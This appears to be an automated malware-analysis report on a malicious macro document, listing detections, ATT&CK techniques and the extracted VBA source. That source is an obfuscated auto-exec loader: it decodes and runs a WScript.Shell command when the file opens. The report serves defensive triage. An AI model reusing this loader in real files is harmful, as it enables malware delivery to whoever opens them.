MALICIOUS
344
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains heavily obfuscated VBA macros, including an auto-exec loader designed to execute a second-stage payload. The Document_Open macro is triggered upon opening, which then calls another subroutine that uses CreateObject to instantiate an object and execute a command. The presence of the 'macros.bas' file and the ClamAV detection for 'Xls.Malware.Valyria-6700360-0' strongly indicate malicious intent, likely for downloading and executing further malware.
Heuristics 10
-
ClamAV: Xls.Malware.Valyria-6700360-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-6700360-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://4a7efb2d53317100f611-1d7064c4f7b6de25658a4199efb34975.ssl.cf1.rackcdn.com/hello-you-please-enable-macros-showcase_image-6-p-2416.jpg In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2857 bytes |
SHA-256: de50164101ca9f496c97b98bc753845f740d02a54c28296dffe2951deff8756d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Function ASZYEEYS() As String
D aASZYEEYS As String
aASZYEEYS = "AF527C6971AB97716971587D70713A717171A7717156717171717189A773A26E818A8A7171718D7171715061719D71945E71718F7194587171716C385E718A7141717135454C3639713871718771"
Dim myASZYEEYS = aASZYEEYS
DimDimMsgBox ((aASZYEEYS & myASZYEEYS, 28))
End Function
Public Sub QJJ_()
Dim OA_ As Object: Set OA_ = CreateObject(IT_("9B97A7B6ADB4B87297ACA9B0B0"))
CallByName OA_, IT_("96B9B2"), VbMethod, IT_(ActiveDocument.Variables("RLBCUCET").Value), 0, True
End Sub
Private Function TPEHOLQF() As String
D aTPEHOLQF As String
aTPEHOLQF = "AF527C6971AB97716971587D70713A717171A7717156717171717189A773A26E818A8A7171718D7171715061719D71945E71718F7194587171716C385E718A7141717135454C3639713871718771"
Dim myTPEHOLQF = aTPEHOLQF
DimDimMsgBox ((aTPEHOLQF & myTPEHOLQF, 28))
End Function
Sub F_()
QJJ_
End Sub
Private Function KQVJAKQU() As String
D aKQVJAKQU As String
aKQVJAKQU = "AF527C6971AB97716971587D70713A717171A7717156717171717189A773A26E818A8A7171718D7171715061719D71945E71718F7194587171716C385E718A7141717135454C3639713871718771"
Dim myKQVJAKQU = aKQVJAKQU
DimDimMsgBox ((aKQVJAKQU & myKQVJAKQU, 28))
End Function
Public Sub Document_Open()
Application.Run IT_("8AA3")
End Sub
Private Function YKOFSKHJ() As String
D aYKOFSKHJ As String
aYKOFSKHJ = "AF527C6971AB97716971587D70713A717171A7717156717171717189A773A26E818A8A7171718D7171715061719D71945E71718F7194587171716C385E718A7141717135454C3639713871718771"
Dim myYKOFSKHJ = aYKOFSKHJ
DimDimMsgBox ((aYKOFSKHJ & myYKOFSKHJ, 28))
End Function
Sub Workbook_Open()
F_
End Sub
Private Function RSGYTHLC() As String
D aRSGYTHLC As String
aRSGYTHLC = "AF527C6971AB97716971587D70713A717171A7717156717171717189A773A26E818A8A7171718D7171715061719D71945E71718F7194587171716C385E718A7141717135454C3639713871718771"
Dim myRSGYTHLC = aRSGYTHLC
DimDimMsgBox ((aRSGYTHLC & myRSGYTHLC, 28))
End Function
Public Function IT_(ByVal OA_ As String)
Dim ZC_ As String
Dim BF_ As Long
For BF_ = 1 To Len(OA_) Step 2
Dim FI_ As Long: FI_ = CLng(Chr(38) & Chr(72) & Mid(OA_, BF_, 2))
ZC_ = ZC_ & Chr(FI_ - 68)
Next
IT_ = ZC_
End Function
Private Function BUOQAZQF() As String
D aBUOQAZQF As String
aBUOQAZQF = "AF527C6971AB97716971587D70713A717171A7717156717171717189A773A26E818A8A7171718D7171715061719D71945E71718F7194587171716C385E718A7141717135454C3639713871718771"
Dim myBUOQAZQF = aBUOQAZQF
DimDimMsgBox ((aBUOQAZQF & myBUOQAZQF, 28))
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.